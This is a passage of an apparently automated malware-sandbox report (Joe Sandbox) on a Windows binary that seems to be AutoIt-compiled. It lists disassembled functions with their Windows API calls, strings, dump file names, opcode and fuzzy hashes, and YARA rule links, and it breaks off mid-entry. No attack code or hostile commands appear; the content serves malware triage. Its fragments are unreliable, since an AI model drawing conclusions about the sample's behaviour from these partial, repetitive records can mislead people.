            • String ID: SysListView32
            • API String ID: 2147712094-78025650
            • Opcode ID: 1fa8b116d2b39bda9a3c810fa9fb1df1ea98d8d4682add0f1c51fa48c55bf23f
            • Instruction ID: 8d8d33b669b8a2e8c65fbfac37d807777080655985e84901f4e7589493f3f504
            • Opcode Fuzzy Hash: 1fa8b116d2b39bda9a3c810fa9fb1df1ea98d8d4682add0f1c51fa48c55bf23f
            • Instruction Fuzzy Hash: 8C419371A00319ABEB219F64CC85FEA7BADFF48354F10056AF994EB281D7759980CB90
            Function 0100BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
            Download Yara Rule
            APIs
            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0100BCFD
            • IsMenu.USER32(00000000), ref: 0100BD1D
            • CreatePopupMenu.USER32 ref: 0100BD53
            • GetMenuItemCount.USER32(011E6BB0), ref: 0100BDA4
            • InsertMenuItemW.USER32(011E6BB0,?,00000001,00000030), ref: 0100BDCC
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Menu$Item$CountCreateInfoInsertPopup
            • String ID: 0$2
            • API String ID: 93392585-3793063076
            • Opcode ID: 698a508b85504ebfcc435af5427ec937b1e22bd8878700caaab833d2e9bf808d
            • Instruction ID: 82f16abe32b70f79caa35db9b7e1972ec25947442c5dc349faa93988248348b0
            • Opcode Fuzzy Hash: 698a508b85504ebfcc435af5427ec937b1e22bd8878700caaab833d2e9bf808d
            • Instruction Fuzzy Hash: 1A51A174600206DBFB22EFA8C984BADFFF4AF45314F1441AAE591E72D1E7709540CB52
            Function 0100C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
            Download Yara Rule
            APIs
            • LoadIconW.USER32(00000000,00007F03), ref: 0100C913
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: IconLoad
            • String ID: blank$info$question$stop$warning
            • API String ID: 2457776203-404129466
            • Opcode ID: 261608bcfe48a5ffef125cc8159f137882a07406ff33d5337d1d15fb3a8b7034
            • Instruction ID: 533f41c8257b82a6fe11597731749a79f08968db4ec16b4def624034b9a01b6d
            • Opcode Fuzzy Hash: 261608bcfe48a5ffef125cc8159f137882a07406ff33d5337d1d15fb3a8b7034
            • Instruction Fuzzy Hash: 50112B31689307BAF7175B549E83DAE37DCDF05320F1001AEF984A61C2E7796E006368
            Function 0100ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _wcslen$LocalTime
            • String ID:
            • API String ID: 952045576-0
            • Opcode ID: a0114d22d4159d4ebfbb159f36d1810d02f6713dfb1e387a1cea2583e232055d
            • Instruction ID: 7e3c91f2f7d1a5d0391d1b0feb2755ce2dbfd9019856cc9dc5daa1e6b8a1c020
            • Opcode Fuzzy Hash: a0114d22d4159d4ebfbb159f36d1810d02f6713dfb1e387a1cea2583e232055d
            • Instruction Fuzzy Hash: 7941A065C1021975DB11EBB4CD8BECFB7A8AF45310F40886AE618F3562FB38E245C3A5
            Function 00FBF8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
            Download Yara Rule
            APIs
            • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00FF682C,00000004,00000000,00000000), ref: 00FBF953
            • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00FF682C,00000004,00000000,00000000), ref: 00FFF3D1
            • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00FF682C,00000004,00000000,00000000), ref: 00FFF454
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ShowWindow
            • String ID:
            • API String ID: 1268545403-0
            • Opcode ID: 2f7bf70bd5998e09c7c434a2d7af98154394fc214e35ee6c3253bb684456c35e
            • Instruction ID: 95b5538a4487a7b602d720314f38f5d8e6a8a17e0ff41e9c0cef3754ea59f958
            • Opcode Fuzzy Hash: 2f7bf70bd5998e09c7c434a2d7af98154394fc214e35ee6c3253bb684456c35e
            • Instruction Fuzzy Hash: 30413D32908644FAD7398B2ACD887BA7B95BF56320F14443DE18762564C636988CFF11
            Function 01032D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
            Download Yara Rule
            APIs
            • DeleteObject.GDI32(00000000), ref: 01032D1B
            • GetDC.USER32(00000000), ref: 01032D23
            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 01032D2E
            • ReleaseDC.USER32(00000000,00000000), ref: 01032D3A
            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 01032D76
            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 01032D87
            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,01035A65,?,?,000000FF,00000000,?,000000FF,?), ref: 01032DC2
            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 01032DE1
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
            • String ID:
            • API String ID: 3864802216-0
            • Opcode ID: 1ca9007890c2e89766dfe08cf75a790e8e736e85797156f030fd135aeacf2ade
            • Instruction ID: 16c1f828892e6a3d16d24a4d0c286a33dd149048902081b5103c78c6bbb1020b
            • Opcode Fuzzy Hash: 1ca9007890c2e89766dfe08cf75a790e8e736e85797156f030fd135aeacf2ade
            • Instruction Fuzzy Hash: 4E318B72201214BBFB218F54CC89FEB3FADEB49711F044056FE88EA291C67A9840C7A0
            Function 01005622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _memcmp
            • String ID:
            • API String ID: 2931989736-0
            • Opcode ID: 5c4fe6568c8a3498fbc5d36b9ba401cf1c3b64f38dc02a935f038c6a8f4942f4
            • Instruction ID: 2bf69de11016c9653dd6b2beff4a973f0f012cb3cdcbebf4a16bb1811d47f37b
            • Opcode Fuzzy Hash: 5c4fe6568c8a3498fbc5d36b9ba401cf1c3b64f38dc02a935f038c6a8f4942f4
            • Instruction Fuzzy Hash: 03219861A4020A77F2165515AF83FFA339CBE56284F040018FD855B5C2F764ED208DA5
            Function 01024FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID:
            • String ID: NULL Pointer assignment$Not an Object type
            • API String ID: 0-572801152
            • Opcode ID: 54bbbb257c15ac24fef1c525eb619220404c8a7fdfa772b47dcb60995f9ff6c7
            • Instruction ID: 4325b7ef2aec2bfe3eb28a7c26c2d9e793cd0b415f45659be127382c47da0d15
            • Opcode Fuzzy Hash: 54bbbb257c15ac24fef1c525eb619220404c8a7fdfa772b47dcb60995f9ff6c7
            • Instruction Fuzzy Hash: 86D19171A0021A9FEF14CFA8CC80AEEB7F5BF48314F148069EA55EB281E775D945CB94
            Function 00FE1522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
            Download Yara Rule
            APIs
            • GetCPInfo.KERNEL32(?,?), ref: 00FE15CE
            • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00FE1651
            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00FE16E4
            • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00FE16FB
              • Part of subcall function 00FD3820: RtlAllocateHeap.NTDLL(00000000,?,01071444,?,00FBFDF5,?,?,00FAA976,00000010,01071440,00FA13FC,?,00FA13C6,?,00FA1129), ref: 00FD3852
            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00FE1777
            • __freea.LIBCMT ref: 00FE17A2
            • __freea.LIBCMT ref: 00FE17AE
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
            • String ID:
            • API String ID: 2829977744-0
            • Opcode ID: 3e0481276ed4b44a7a5397d40716710523c81de7af1c154cf66c4629eb4bab13
            • Instruction ID: 2eeabbfa45536de872b546e628145db18ef26f1925faac5cca6637e7e4069d60
            • Opcode Fuzzy Hash: 3e0481276ed4b44a7a5397d40716710523c81de7af1c154cf66c4629eb4bab13
            • Instruction Fuzzy Hash: 9891B572E002969ADF208E77CC81EEE7BB5BF49720F184659E911E7140D739DD44EB60
            Function 01024523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Variant$ClearInit
            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
            • API String ID: 2610073882-625585964
            • Opcode ID: 5bdc3bb366885a2483b865fee161e6900341ccb2cc645452d65ac09647408801
            • Instruction ID: 4dadbd84b67e8f61b08f961cc8ff529ac6871be5c4e1079ed129a862fa9b5cf9
            • Opcode Fuzzy Hash: 5bdc3bb366885a2483b865fee161e6900341ccb2cc645452d65ac09647408801
            • Instruction Fuzzy Hash: 4E917D71A00229EBDF24CFA5C888EAEBBB8FF45714F008559E595EB281D7709941CFA0
            Function 01011187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
            Download Yara Rule
            APIs
            • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0101125C
            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 01011284
            • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 010112A8
            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 010112D8
            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0101135F
            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 010113C4
            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 01011430
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ArraySafe$Data$Access$UnaccessVartype
            • String ID:
            • API String ID: 2550207440-0
            • Opcode ID: 0fcab0b4df3ccaa3fcdbd8cb164420cf3c086b9c861921db8de3a0d13e51a02a
            • Instruction ID: 255cd81bd3278ec63235a88a36bfbaf46bd62d631c5d21bcac93b242ea8ba8dd
            • Opcode Fuzzy Hash: 0fcab0b4df3ccaa3fcdbd8cb164420cf3c086b9c861921db8de3a0d13e51a02a
            • Instruction Fuzzy Hash: 2091F671A002099FEB04DFA8D884BFE77B5FF45714F144029E681E7299DB7DA941CB90
            Function 00FB948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ObjectSelect$BeginCreatePath
            • String ID:
            • API String ID: 3225163088-0
            • Opcode ID: 878eb3532dacf28cf6e044e1d3fd6f1f1fe69536e2dddb2c1334755c9ed9049e
            • Instruction ID: 549df622e05bc802f82fced9b0dba1de930ba06f65746e44526afbfc851afcf5
            • Opcode Fuzzy Hash: 878eb3532dacf28cf6e044e1d3fd6f1f1fe69536e2dddb2c1334755c9ed9049e
            • Instruction Fuzzy Hash: D7913671D44219AFCB10CFA9CC84AEEBBB8FF49320F148459E615B7251D379A941DF60
            Function 01023947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
            Download Yara Rule
            APIs
            • VariantInit.OLEAUT32(?), ref: 0102396B
            • CharUpperBuffW.USER32(?,?), ref: 01023A7A
            • _wcslen.LIBCMT ref: 01023A8A
            • VariantClear.OLEAUT32(?), ref: 01023C1F
              • Part of subcall function 01010CDF: VariantInit.OLEAUT32(00000000), ref: 01010D1F
              • Part of subcall function 01010CDF: VariantCopy.OLEAUT32(?,?), ref: 01010D28
              • Part of subcall function 01010CDF: VariantClear.OLEAUT32(?), ref: 01010D34
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
            • String ID: AUTOIT.ERROR$Incorrect Parameter format
            • API String ID: 4137639002-1221869570
            • Opcode ID: 48f4bdb8c613707580179eeda6d11b998a7790e33a3a234bc25141119e8b05e7
            • Instruction ID: 21b2a4fe177bf448d3014b4ae0c5bcfd4f037e4f2062fc269c736a91370c7d6c
            • Opcode Fuzzy Hash: 48f4bdb8c613707580179eeda6d11b998a7790e33a3a234bc25141119e8b05e7
            • Instruction Fuzzy Hash: 09915974A083159FC704EF28C88096AB7E5FF89714F04886EF9C99B351DB39E905CB92
            Function 01024BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 0100000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00FFFF41,80070057,?,?,?,0100035E), ref: 0100002B
              • Part of subcall function 0100000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00FFFF41,80070057,?,?), ref: 01000046
              • Part of subcall function 0100000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00FFFF41,80070057,?,?), ref: 01000054
              • Part of subcall function 0100000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00FFFF41,80070057,?), ref: 01000064
            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 01024C51
            • _wcslen.LIBCMT ref: 01024D59
            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 01024DCF
            • CoTaskMemFree.OLE32(?), ref: 01024DDA
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
            • String ID: NULL Pointer assignment
            • API String ID: 614568839-2785691316
            • Opcode ID: 831d2329a5fc7aab607626438702b3eee8dfb32d1543a38565a3b40e846301d4
            • Instruction ID: b0a8741971d36eadaae8b232d1e90a5e2932fe8250f901a8b4da6e273d513e74
            • Opcode Fuzzy Hash: 831d2329a5fc7aab607626438702b3eee8dfb32d1543a38565a3b40e846301d4
            • Instruction Fuzzy Hash: B29118B1D0022D9FEF15DFA4CC90AEEBBB8BF08314F10856AE955A7241DB745A44CF60
            Function 010320FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
            Download Yara Rule
            APIs
            • GetMenu.USER32(?), ref: 01032183
            • GetMenuItemCount.USER32(00000000), ref: 010321B5
            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 010321DD
            • _wcslen.LIBCMT ref: 01032213
            • GetMenuItemID.USER32(?,?), ref: 0103224D
            • GetSubMenu.USER32(?,?), ref: 0103225B
              • Part of subcall function 01003A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 01003A57
              • Part of subcall function 01003A3D: GetCurrentThreadId.KERNEL32 ref: 01003A5E
              • Part of subcall function 01003A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,010025B3), ref: 01003A65
            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 010322E3
              • Part of subcall function 0100E97B: Sleep.KERNEL32 ref: 0100E9F3
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
            • String ID:
            • API String ID: 4196846111-0
            • Opcode ID: 6a3845f4023c256c2e51911f8e88468b3f4e918a6ec42a79f498ca34258f9e08
            • Instruction ID: 679b502cb266f0ad30024377eca5e3425a637eadac310a2960acb0fbffc5c4aa
            • Opcode Fuzzy Hash: 6a3845f4023c256c2e51911f8e88468b3f4e918a6ec42a79f498ca34258f9e08
            • Instruction Fuzzy Hash: E3719075E00205AFCB11DF68CD45AAEBBF9EF89310F148499E996EB341DB34E9418B90
            Function 0100AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
            Download Yara Rule
            APIs
            • GetParent.USER32(?), ref: 0100AEF9
            • GetKeyboardState.USER32(?), ref: 0100AF0E
            • SetKeyboardState.USER32(?), ref: 0100AF6F
            • PostMessageW.USER32(?,00000101,00000010,?), ref: 0100AF9D
            • PostMessageW.USER32(?,00000101,00000011,?), ref: 0100AFBC
            • PostMessageW.USER32(?,00000101,00000012,?), ref: 0100AFFD
            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0100B020
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: MessagePost$KeyboardState$Parent
            • String ID:
            • API String ID: 87235514-0
            • Opcode ID: 9aa9cf2427d7d28400edc3454da1162e52f099b9890d087c6dc594e209207c06
            • Instruction ID: 54eab53bccea9bc9c51c4ebc56e1c77983303ee5f4e9bb9bd2c00415f2ffb240
            • Opcode Fuzzy Hash: 9aa9cf2427d7d28400edc3454da1162e52f099b9890d087c6dc594e209207c06
            • Instruction Fuzzy Hash: 6651B1A0A047D67DFB7782788845BBABEE95B06304F0885CDF2D9968C3C699A8C4D750
            Function 0100ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
            Download Yara Rule
            APIs
            • GetParent.USER32(00000000), ref: 0100AD19
            • GetKeyboardState.USER32(?), ref: 0100AD2E
            • SetKeyboardState.USER32(?), ref: 0100AD8F
            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0100ADBB
            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0100ADD8
            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0100AE17
            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0100AE38
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: MessagePost$KeyboardState$Parent
            • String ID:
            • API String ID: 87235514-0
            • Opcode ID: 1074c6360ab1ea96f12e6b68251886f703f27d3f812910e9e024c9f93010609b
            • Instruction ID: 194abb0b061740a96f50fdbe81973ab72c72e2d6a9a965c5d07c94b927484dd8
